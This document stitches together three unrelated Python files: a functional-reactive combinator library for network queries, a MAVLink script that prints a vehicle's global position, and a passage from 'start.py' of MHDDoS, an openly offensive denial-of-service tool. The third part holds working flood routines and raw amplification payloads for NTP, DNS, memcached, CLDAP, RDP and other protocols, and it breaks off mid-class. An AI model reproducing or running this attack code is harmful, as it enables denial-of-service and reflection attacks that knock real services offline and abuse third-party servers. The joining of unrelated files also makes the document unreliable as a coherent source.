# LoopPre : c -> EF (a,c) (b,c) -> EF a b
def LoopPre(c, ef1, c_type=None):
ef = None
def prepare():
ef1.prepare()
for l in ef.listeners.itervalues():
l.prepare()
def push(x):
ef1.push((x,ef.cell.get()))
def push2((y1,y2)):
ef.cell.set(y2)
for l in ef.listeners.itervalues():
l.push(y1)
def finish():
ef1.finish()
for l in ef.listeners.itervalues():
l.finish()
def terminate():
ef1.terminate()
for l in ef.listeners.itervalues():
l.terminate()
def type_fun(a):
if a is None or c_type is None:
return None
eftype = ef1.type_fun(types.FType((a.type, c_type.type)))
if eftype is None:
return None
(b, c) = eftype.type
if not types.is_of_type(c_type, types.FType(c)):
raise types.FTypeException("%s is not of type %s" % (c, c_type))
return types.FType(b)
ef = FEventFun(
prepare=prepare,
push=push,
finish=finish,
terminate=terminate,
type_fun = type_fun)
ef.cell = util.FRef()
ef.cell.set(c)
ef1.add_listener(FListener(push=push2))
return ef
# bind: (a -> E b) -> EF a b
# Filter : (a -> bool) -> EF a a
def Filter(g):
ef = None
def push(x):
if g(x):
for l in ef.listeners.itervalues():
l.push(x)
ef = FEventFun(push=push, type_fun = lambda a : a)
return ef
# Group : (a -> b) -> EF a (b * E a)
def Group(g, b_type=None):
ef = None
def prepare():
for l in ef.listeners.itervalues():
l.prepare()
for e in ef.table.values():
e.fresh = False
for l in e.listeners.itervalues():
l.prepare()
def push(x):
y = g(x)
e = None
if not (ef.table.has_key(y)):
e = FEvent()
ef.table[y] = e
for l in ef.listeners.itervalues():
l.push((y,e))
else:
e = ef.table[y]
for l in e.listeners.itervalues():
l.push(x)
def finish():
for e in ef.table.values():
for l in e.listeners.itervalues():
l.finish()
e.fresh = True
for l in ef.listeners.itervalues():
l.finish()
def terminate():
for e in ef.table.values():
for l in e.listeners.itervalues():
l.terminate()
for l in ef.listeners.itervalues():
l.terminate()
def type_fun(a):
if a is not None and b_type is not None:
return types.FType((b_type.type, types.FEventType(a.type)))
else:
return None
ef = FEventFun(prepare=prepare,
push=push,
finish=finish,
terminate=terminate,
type_fun=type_fun)
ef.table = {}
return ef
# Regroup : ((a * a) -> Bool) -> EF (b * E a) (b * E a)
def Regroup(feq):
# helper function to split a nested subevent
def mk_subevent(e,outer_prepare,outer_push):
sube_cell = util.FRef()
def mk():
sube = FEvent()
sube.last_cell = util.FRef()
return sube
def subprepare():
sube = sube_cell.get()
sube.fresh = False
for l in sube.listeners.itervalues():
l.prepare()
def subpush(x):
sube = sube_cell.get()
last = sube.last_cell.get()
if not (last is None) and not (feq(last,x)):
# terminate / create new subevent
sube_old = sube
sube = mk()
subterminate()
sube_cell.set(sube)
subprepare()
outer_prepare()
outer_push(sube)
for l in sube.listeners.itervalues():
l.push(x)
sube.last_cell.set(x)
def subfinish():
sube = sube_cell.get()
for l in sube.listeners.itervalues():
l.finish()
sube.fresh = True
def subterminate():
sube = sube_cell.get()
for l in sube.listeners.itervalues():
l.terminate()
sube = mk()
sube_cell.set(sube)
e.add_listener(FListener(subprepare,subpush,subfinish,subterminate))
return sube
ef = None
def prepare():
for l in ef.listeners.itervalues():
l.prepare()
def push((x,e)):
outer_push = lambda e: push((x,e))
sube = mk_subevent(e,prepare,outer_push)
for l in ef.listeners.itervalues():
l.push((x,sube))
# TODO(astory): consider checking for correctness
ef = FEventFun(push=push, type_fun = lambda a : a)
return ef
# Ungroup : int option * (b * a -> b) -> b -> EF (c * E a) (c * b)
def Ungroup(n,f,init, init_type=None):
ef = None
def go(x,y):
for l in ef.listeners.itervalues():
l.push((x,y))
def mk_lpush(e):
def g(z):
(x,i,b,y) = ef.table[e]
if not b:
y = f(y,z)
if not (n is None) and i == n - 1:
b = True
go(x,y)
ef.table[e] = (x,i+1,b,y)
return g
def mk_lterm(e):
def g():
(x,i,b,y) = ef.table[e]
if not b:
go(x,y)
return g
def push((x,e)):
ef.table[e] = (x,0,False,init)
e.add_listener(FListener(push=mk_lpush(e),terminate=mk_lterm(e)))
def type_fun(t):
if t is None or init_type is None:
return None
try:
(c, a) = t.type
except (TypeError, ValueError):
raise types.FTypeException("%s not an instance of (c * E a)" % a)
f_out_type = f.type_fun(types.FType((init_type.type, a.type)))
if not types.is_of_type(f_out_type, init_type):
raise types.FTypeException(
"%s not of expected type: f generates %s instead of %s"
% (t, f_out_type, init_type))
return types.FType((c, init_type.type))
ef = FEventFun(push=push,type_fun=type_fun)
ef.table = {}
return ef
#############
# BEHAVIORS #
#############
# Hold : a -> E a -> B a
def Hold(a,e1):
b = None
def pull():
return b.cell.get()
def push(a):
b.cell.set(a)
b = FBehavior(pull, types.FBehaviorType(e1.type))
b.cell = util.FRef()
b.cell.set(a)
e1.add_listener(FListener(push=push))
return b
# Snapshot : B a -> E b -> E (a,b)
def Snapshot(b1,e2):
e = None
def prepare():
e.fresh = False
for l in e.listeners.itervalues():
l.prepare()
def push(b):
a = b1.pull()
for l in e.listeners.itervalues():
l.push((a,b))
def finish():
for l in e.listeners.itervalues():
l.finish()
e.fresh = True
def terminate():
for l in e.listeners.itervalues():
l.terminate()
e2.add_listener(FListener(prepare,push,finish,terminate))
e = FEvent(type=types.FEventType((b1.type, e2.type)))
return e
############################
# LISTENERS and REGISTRARS #
############################
#def Attach(e,l):
# e.add_listener(l)
#
## Print_listener : string -> output channel -> L string
#def Print(g=None,s=sys.stdout):
# def push(x):
# if g is None:
# print >> s, str(x)
# else:
# g(x)
# return FListener(push=push)
#
## Install_listener : Policy
#def Control():
# def push(rs):
# #exeModule something for policies
# print 'control policies'
# return FListener(push=push)
# register_static : (rule set) -> unit
#def register_static_rules(rs):
# rts.set_rules(rs)
# Nox_packet_listener L (switch * nox_packet * port)
#def NOXSend():
# def push((dpid,packet,port)):
# a = [[openflow.OFPAT_OUTPUT,[0,port]]]
# net.inst.send_openflow_packet(dpid, packet.tostring(), a)
# return FListener(push=push)
#def NOXSendPkt():
# def push(pkt):
# a = [[openflow.OFPAT_OUTPUT,[0,net.inport(net.header(pkt))]]]
# net.inst.send_openflow_packet(net.switch(net.header(pkt)), pkt.payload.tostring(), a)
# return FListener(push=push)
############
## LIBRARY #
############
## TODO(astory): type variables
#
## Identity : EF a a
#def Identity():
# return Lift(lambda x: x, type_fun=lambda x: x)
#
## Probe : string -> EF a a
#def Probe(y, s=sys.stdout):
# def f(x):
# print >> s, (str(y) + str(x))
# return x
# return Lift(f, type_fun=lambda x:x)
#
## Dup : EF a (a * a)
#def Dup():
# def type_fun(t):
# if t is None:
# return None
# return types.FType((t.type, t.type))
# return Lift(lambda x: (x,x), type_fun=type_fun)
#
## Smash : a * b * E a * E b -> E (a * b)
#def Smash(a,b,e1,e2):
# def m((a2,b2),(a1,b1)):
# if a2 is None:
# return (a1,b2)
# elif b2 is None:
# return (a2,b1)
# else:
# return (a2,b2)
# t = None
# t1 = e1.type
# t2 = e2.type
# if t1 is not None and t2 is not None:
# t = FType((t1,t2))
# e = Merge(e1,e2) >> \
# Accum((a,b), m, init_type=t)
# return e
#
## Fst : EF (a * b) a
#def Fst():
# def typef(t):
# if t is None:
# return None
# try:
# (x,y) = t.type
# return types.FType(x)
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * b" % t)
# return Lift(lambda (x,y): x, type_fun=typef)
#
## Snd : Ef (a * b) b
#def Snd():
# def typef(t):
# if t is None:
# return None
# try:
# (x,y) = t.type
# return types.FType(y)
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * b" % t)
# return Lift(lambda (x,y): y, type_fun=typef)
#
## Swap : EF (a * b) (a * b)
#def Swap():
# # TODO(astory): I think this is supposed to be a,b -> b,a
# def typef(t):
# if t is None:
# return None
# try:
# (x,y) = t.type
# return types.FType((y,x))
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * b" % t)
# return Lift(lambda (x,y): (y,x), type_fun=typef)
#
## Second : EF c d -> EF (a * c) (a * d)
#def Second(ef2):
# return Compose(Swap(),Compose(First(ef2),Swap()))
#
## Pair : EF a b * EF c d -> EF (a * c) -> EF (b * d)
#def Pair(ef1,ef2):
# return Compose(First(ef1),Second(ef2))
#
## Ticks : EF a int
#def Ticks():
# def type_fun(t):
# try:
# (a, i) = t.type
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * integer" % t)
# if i != "integer":
# raise FTypeException("%s not of type %s" % (t, "a * integer"))
# return types.FType(("integer", "integer"))
# return LoopPre(0, Lift(
# lambda (x,y): (y,y+1),
# type_fun=type_fun), c_type=types.FType("integer"))
#
## Reverse : EF string string
#def Reverse():
# return Lift(lambda x: ''.join([y for y in reversed(x)]),
# in_type=types.FType("string"),
# out_type=types.FType("string"))
#
## Split2 : EF string (string * string)
#def Split2(s):
# def f(x):
# try:
# i = x.index(s)
# x1 = x[:i]
# x2 = x[i+1:len(x)]
# return (x1,x2)
# except ValueError:
# return (x,"")
# return Lift(f, types.FType("string"), types.FType(("string", "string")))
#
## Tabulate : EF string ((string, string list) dictionary)
#def Tabulate():
# def f(((k,v),d)):
# if not d.has_key(k):
# d[k] = []
# d[k].append(v)
# return (d,d)
# # TODO(astory): list, dictionary types
# return LoopPre({},Lift(f,
# in_type=types.FType("string"),
# out_type=types.FType((("string", "string list"), "dictionary"))),
# c_type="dictionary")
#
## TopK : int -> EF ((string,string list) dictionary) (string list)
#def TopK(n):
# def f(d):
# l = []
# for (k,v) in d.items():
# i = reduce(lambda x,w: x + len(w),v,0)
# l.append((k,i))
# l.sort(cmp=lambda (k1,i1),(k2,i2): cmp(i1,i2))
# return map(lambda (k,i):k, l[-n:])
# return Lift(f,
# in_type=types.FType((("string", "string list"), "dictionary")),
# out_type=types.FType("string list"))
#
## Calm : EF a a
#def Calm():
# def calmfilter((x,(isMatched,y))):
# return isMatched
# def calmupdate((x,(isLastMatched,y))):
# if isLastMatched:
# return (x, (x != y, x))
# else:
# return (x, (True, x))
# def type_fun(tup):
# (x,(boolean,y)) = tup.type
# if boolean != "boolean":
# raise types.FTypeException(
# "%s is not of type %s" % (tup, "a * (boolean * a)"))
# return tup
# return LoopPre(
# (False,None),
# Compose(
# Lift(calmupdate, type_fun=type_fun),
# Filter(calmfilter)),
# c_type=types.FType(("boolean", None)))
#
## Beacon : E int
#def Beacon(n):
# return\
# Seconds() >>\
# (Lift(lambda x:(x // n)*n,types.FType("integer"), types.FType("integer")) >> Calm())
#
## Divide : ((a * a) -> Bool) -> EF a (E a)
#def Divide(feq):
# return (Group(lambda x:None, b_type=types.FType(None)) >>
# Regroup(feq) >>
# Snd())
#
## GroupByTime : ???
#def GroupByTime(n):
# # types intentionally left none
# return (Lift(lambda (o,ps): (o,Merge(ps,Beacon(n)))) >>
# Regroup(net.beacon_sp()))
#
## ReGroupByTime : ???
#def ReGroupByTime(n):
# # types intentionally left none
# def add_beacon((x, s)):
# return (x, Merge(s, Beacon(n)))
# def append_packets(l, (p,b)):
# if (p is None):
# return l[:]
# else:
# return list_append(l, p)
# sf = (Lift(add_beacon) >>
# Regroup(net.beacon_sp()) >>
# Ungroup(None, append_packets, []))
# return sf
#
## SplitByTime : ???
#def SplitByTime(n):
# # types intentionally left none
# sf = (Group(constant_gp(None)) >>
# ReGroupByTime(n) >>
# Snd())
# return sf
#
## Accum : a * (a -> b -> a) -> EF b a
#def Accum(init, f, init_type=None):
# def body((next,last)):
# newout = f(next,last)
# return (newout,newout)
# return LoopPre(init, Lift(body,type_fun=lambda x:init_type), c_type=init_type)
#
## Tally : EF a int
#def Tally():
# return Lift(lambda x: 1, type_fun=lambda a : types.FType("integer"))
#
## Sum : EF int int
#def Sum():
# return Accum(0,(lambda x, y: x + y), init_type=types.FType("integer"))
#
## LiftF : (unit -> EF a b) -> EF (E a) (E b)
#def LiftF(eff):
# # TODO(astory): figure out typing
# return Lift(lambda ea: Apply(ea, eff ()))
#
## StickyMerge : E (a option) * E (b option) -> E (a * b)
#def StickyMerge(e1,e2):
# # TODO(astory): figure out typing
# def f(((x,y),(xl,yl))):
# retx = xl if (x is None) else x
# rety = yl if (y is None) else y
# return ((retx,rety),(retx,rety))
# return (Apply(Merge(e1,e2),LoopPre((None,None),Lift(f))))
#
###############
## UNIT TESTS #
###############
#
#unit_test([1,2,3,4,5],Dup(),[(1,1),(2,2),(3,3),(4,4),(5,5)])
#unit_test([1,2,3,4,5,6,7,8,9,10], Filter(lambda x: x == 5), [5])
#unit_test([1,2,3,4,5,6,7,8,9,10], Filter(lambda x: x > 5), [6,7,8,9,10])
#unit_test([1,10,100,1000,10000],Tally(),[1,1,1,1,1])
#unit_test([1,10,100,1000,10000],Compose(Tally(),Sum()),[1,2,3,4,5])
#unit_test_merge([('a',None),(None,1),('b',None),(None,2),(None,3),('c',None)],
# StickyMerge,
# [('a',None),('a',1),('b',1),('b',2),('b',3),('c',3)])
#
## functional list append
#def list_append(l,x):
# l_copy = l[:]
# l_copy.append(x)
# return l_copy
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Group(lambda x: x / 5) >>
# Regroup(lambda x,y:True) >>
# Ungroup(None,list_append,[]),
# [(0,[1,2,3,4]), (1,[5,6,7,8,9]), (2,[10])])
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Group(lambda x: x / 5) >>
# Regroup(lambda x,y:False) >>
# Ungroup(None,lambda acc,x:x,None),
# [(0,1),(0,2),(0,3),(1,5),(1,6),(1,7),(1,8),(0,4),(1,9),(2,10)])
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Group(lambda x: x / 5) >>
# Regroup(lambda x,y:False) >>
# Ungroup(1,lambda acc,x:x,None),
# [(0,1),(0,2),(0,3),(0,4),(1,5),(1,6),(1,7),(1,8),(1,9),(2,10)])
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Divide(lambda x1,x2: x1 / 5 == x2 / 5) >>
# Lift(lambda x: (None,x)) >>
# Ungroup(None,list_append,[]) >>
# Snd(),
# [[1,2,3,4],[5,6,7,8,9],[10]])
###########
# Queries #
###########
# Queries
#class FQuery:
# def __init__(self,typ,num,fp,gp,sp,win,compose):
# self.complete = False
# self.typ = typ
# self.num = num
# self.fp = fp
# self.gp = gp
# self.sp = sp
# self.win = win
# self.compose = compose
# def __rshift__(self,other):
# other_name = other.__class__.__name__
# if other_name == "FEventFun":
# return Subscribe(self) >> other
# elif other_name == "FListener":
# return Subscribe(self) >> other
# else:
# raise util.IllegalArgument("Cannot compose FQuery and %s" % other_name)
# def __mul__(self,other):
# other_name = other.__class__.__name__
# if other_name == "FQuery":
# return other.compose(self)
# else:
# raise util.IllegalArgument("Cannot compose FQuery and %s" % other_name)
#
#def Select(x):
# def compose(q):
# q.typ = x
# q.complete = True
# return q
# q = FQuery(x,None,net.true_fp(),[],[],None,compose)
# q.complete = True
# return q
#
#def Where(fp):
# def compose(q):
# q.fp = net.and_fp([q.fp,fp])
# return q
# return FQuery('packets',None,fp,[],[],None,compose)
#
#def GroupBy(gp):
# def compose(q):
# for f in gp:
# q.gp.append(f)
# return q
# return FQuery('packets',None,net.true_fp(),gp,[],None,compose)
#
#def SplitWhen(sp):
# def compose(q):
# for f in sp:
# q.sp.append(f)
# return q
# return FQuery('packets',None,net.true_fp(),[],sp,None,compose)
#
#def Limit(num):
# def compose(q):
# q.num = num
# return q
# return FQuery('packets',num,net.true_fp(),[],[],None,compose)
#
#def Every(win):
# def compose(q):
# q.win = win
# return q
# return FQuery('packets',None,net.true_fp(),[],[],win,compose)
#
## subscribe
#def Subscribe(q):
# if not q.complete:
# raise util.IllegalArgument("FQuery must at least have a Select")
# return rts.add_query(q)
#
##packets
#def Packets():
# return Subscribe(Select('packets'))
|
view_global_position.py
|
#!/usr/bin/env python3
# Copyright 2020, NTRobotics
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pymavlink import mavutil
from pymavlink.mavutil import mavlink
import threading
import time
from utils import main_utils, param_utils
connection = None
need_reboot = False
def check_and_set_param(param, param_id, param_value):
global need_reboot
if param.param_id != param_id:
return
remote_value = param_utils.decode_param(param)
if isinstance(remote_value,int):
differ = (remote_value != param_value)
else:
differ = (abs(remote_value - param_value) > 0.001)
if differ:
param_utils.set_parameter(connection, param_id, param_value)
need_reboot = True
stamp_offset_ms = None
def send_attitude():
global stamp_offset_ms
while True:
stamp = int(time.time() * 1000) + stamp_offset_ms
connection.mav.attitude_send(stamp, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
time.sleep(0.05)
if __name__ == '__main__':
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
params = param_utils.list_params(connection)
for p in params:
print('Param %s = %3.6f' % (p.param_id, p.param_value))
check_and_set_param(p, 'SAVE_MAP', 0)
check_and_set_param(p, 'LOAD_MAP', 0)
check_and_set_param(p, 'SEND_ORIGIN', 0)
check_and_set_param(p, 'INIT_ALT', 1.0)
if need_reboot:
print('Parameters was changed. Rebooting, please wait...')
main_utils.reboot(connection)
main_utils.stop_sending_heartbeat(connection)
del connection
time.sleep(5)
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
print('Got heartbeat.')
sys_time_msg = connection.recv_match(type='SYSTEM_TIME', blocking=True)
now_us = int(time.time() * 1e6)
time_diff_us = sys_time_msg.time_unix_usec - now_us
boot_offset_us = sys_time_msg.time_boot_ms * 1000 - sys_time_msg.time_unix_usec
stamp_offset_ms = int((time_diff_us + boot_offset_us) / 1000)
print('Stamp offset is %d ms' % stamp_offset_ms)
attitude_thread = threading.Thread(target=send_attitude, daemon=True)
attitude_thread.start()
main_utils.send_command(
connection,
mavlink.MAV_CMD_SET_MESSAGE_INTERVAL,
param1=float(mavlink.MAVLINK_MSG_ID_GLOBAL_POSITION_INT),
param2=1e6
)
print('Press Ctrl-C to terminate receiving global position messages.')
try:
while True:
msg = connection.recv_match(type=['HEARTBEAT', 'GLOBAL_POSITION_INT', 'STATUSTEXT'], blocking=True)
if msg.get_type() == 'HEARTBEAT':
old_state = msg.system_status
if msg.system_status == mavlink.MAV_STATE_EMERGENCY:
print("*** NO COORDINATES ***")
elif msg.system_status == mavlink.MAV_STATE_CRITICAL:
print("*** ONLY ALTITUDE ***")
elif msg.system_status == mavlink.MAV_STATE_STANDBY:
print("*** FULL COORDINATES ***")
else:
print("*** UNEXPECTED SYSTEM STATUS (%d) ***" % msg.system_status)
elif msg.get_type() == 'GLOBAL_POSITION_INT':
print('Global Position message received (ms,lat,lon,alt,rel_alt,vx,vy,vz,hdg): %d, %.5f, %.5f, %.3f,'
' %.3f, %.3f, %.3f, %.3f, %.3f' %
(msg.time_boot_ms, msg.lat/1e7, msg.lon/1e7, msg.alt/1e3, msg.relative_alt, msg.vx, msg.vy, msg.vz, msg.hdg)
)
elif msg.get_type() == 'STATUSTEXT':
main_utils.handle_statustext(connection, msg)
else:
print('Unexpected message %s' % msg.get_type())
except KeyboardInterrupt:
exit(0)
|
start.py
|
#!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from random import choice as randchoice
from random import randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter(object):
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return "".join([chr(randint(0, 1000)) for _ in range(lengh)]).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
